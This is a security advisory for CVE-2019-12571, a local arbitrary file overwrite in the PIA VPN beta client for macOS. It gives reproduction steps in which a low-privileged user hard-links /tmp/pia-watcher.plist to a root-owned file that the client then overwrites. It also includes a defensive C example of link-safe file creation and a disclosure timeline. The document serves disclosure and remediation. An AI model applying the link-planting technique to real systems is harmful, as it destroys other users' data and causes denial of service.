Title: PIA Beta macOS Arbitrary File Overwrite
Author: Rich Mirch
CVE: CVE-2019-12571
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client
v0.9.8 beta (build 02099) for macOS could allow an authenticated, local attacker to
overwrite arbitrary files.
When the client initiates a connection, the XML property list file /tmp/pia-watcher.plist is created.
If the file already exists, it is truncated and its contents are completely overwritten.
The file is removed on disconnect. Because /tmp is world-writable, an unprivileged user can first
create /tmp/pia-watcher.plist as a hard or soft link to an arbitrary file owned by any user on the
system, including root; the client then overwrites the link target with the plist. This creates
a denial of service condition and possible data loss if leveraged by a malicious local user.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C
Base: 7.1
Temporal: 7.1
Test Environment
OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v0.9.8 beta (build 02099)
Steps to reproduce
All steps are executed as a low privileged user.
macbook:~ test2$ id
uid=508(test2) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),704(com.apple.sharepoint.group.4),100(_lpoperator),701(com.apple.sharepoint.group.1),333(piavpn),703(com.apple.sharepoint.group.3),702(com.apple.sharepoint.group.2)
Step 1 - Create a root owned test file with permissions 600.
bash-3.2# echo "this is a test" > /etc/test.file
bash-3.2# chmod 600 /etc/test.file
bash-3.2# ls -ld /etc/test.file
-rw------- 1 root wheel 15 Dec 27 10:14 /etc/test.file
Step 2 - Show that test2 does not have permission to write to /etc/test.file.
macbook:~ test2$ echo test > /etc/test.file
-bash: /etc/test.file: Permission denied
Step 3 - Create a hard or soft link to a root owned file.
macbook:~ test2$ ln /etc/test.file /tmp/pia-watcher.plist
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /etc/test.file
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /tmp/pia-watcher.plist
Step 4 - Open the PIA client and connect. The file will be overwritten with the XML plist.
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist
ls: /tmp/pia-watcher.plist: No such file or directory
12888119231 -rw------- 1 root wheel 801 Dec 27 10:17 /etc/test.file
Step 5 - As root, display the contents of /etc/test.file. It now holds the plist instead of the original data.
bash-3.2# cat /etc/test.file
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.privateinternetaccess.vpn.watcher</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Private Internet Access.app/Contents/MacOS/pia-openvpn-helper</string>
</array>
<key>EnvironmentVariables</key>
<dict>
<key>script_type</key>
<string>watch-notify</string>
</dict>
<key>StandardErrorPath</key>
<string>/Library/Application Support/com.privateinternetaccess.vpn/watcher.log</string>
<key>WatchPaths</key>
<array>
<string>/Library/Preferences/SystemConfiguration</string>
</array>
</dict>
</plist>
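The root cause in Steps 3-4 is a privileged process writing to a fixed, attacker-controllable name in /tmp with plain truncating open semantics. The following is an added example, not code from the advisory or from PIA: a C writer (hypothetical names create_private_file and demo_writer) that creates the file with O_CREAT|O_EXCL|O_NOFOLLOW so that a pre-planted hard or soft link is refused, then replays the advisory's hard-link scenario in a private temporary directory to show the victim file survives.

```c
#define _GNU_SOURCE            /* mkdtemp, O_NOFOLLOW on glibc */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened replacement for "open a fixed /tmp path for writing, truncating
 * whatever is there". Returns 0 on success, -1 if anything already exists at
 * `path` (plain file, symlink or hard link) or the new file fails checks. */
int create_private_file(const char *path, const char *contents) {
    /* O_CREAT|O_EXCL fails atomically with EEXIST if the name exists, so a
     * pre-planted link is never opened; O_NOFOLLOW is defence in depth. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    struct stat st;
    /* Confirm we got a regular file we own, with exactly one name. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd); unlink(path); return -1;
    }
    size_t len = strlen(contents);
    ssize_t n = write(fd, contents, len);
    close(fd);
    return (n == (ssize_t)len) ? 0 : -1;
}

/* Runs the writer against a fixed name inside a private temp dir. With
 * plant_hardlink set, a constructed 15-byte "victim" file is first hard-linked
 * to that name, as in the advisory's Step 3. Returns the writer's result
 * (0 written, -1 refused), or -2 if setup failed or the victim was modified. */
int demo_writer(int plant_hardlink) {
    char dir[] = "/tmp/plistdemo.XXXXXX", victim[256], target[256];
    if (mkdtemp(dir) == NULL) return -2;
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(target, sizeof target, "%s/pia-watcher.plist", dir);
    FILE *f = fopen(victim, "w");
    if (f == NULL) return -2;
    fputs("this is a test\n", f);            /* constructed sample, 15 bytes */
    fclose(f);
    if (plant_hardlink && link(victim, target) != 0) return -2;
    int rc = create_private_file(target, "<plist/>\n");
    struct stat st;
    int intact = (stat(victim, &st) == 0 && st.st_size == 15);
    unlink(target); unlink(victim); rmdir(dir);
    return intact ? rc : -2;
}
```

Refusing to open through an existing name stops the overwrite but still lets a local user block the watcher by pre-creating the name; writing the plist under a directory that other users cannot write to (or via mkstemp) removes that residual denial of service as well.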
Timeline:
2018-12-27: Reported to vendor
2018-12-27: Vendor acknowledged receipt of report
2019-01-18: Vendor states a fix will be available in v83; however, this version was never released.
The desktop client was re-written. Upgrade to v1.2.1 or later of the new client.
2019-06-10: Public disclosure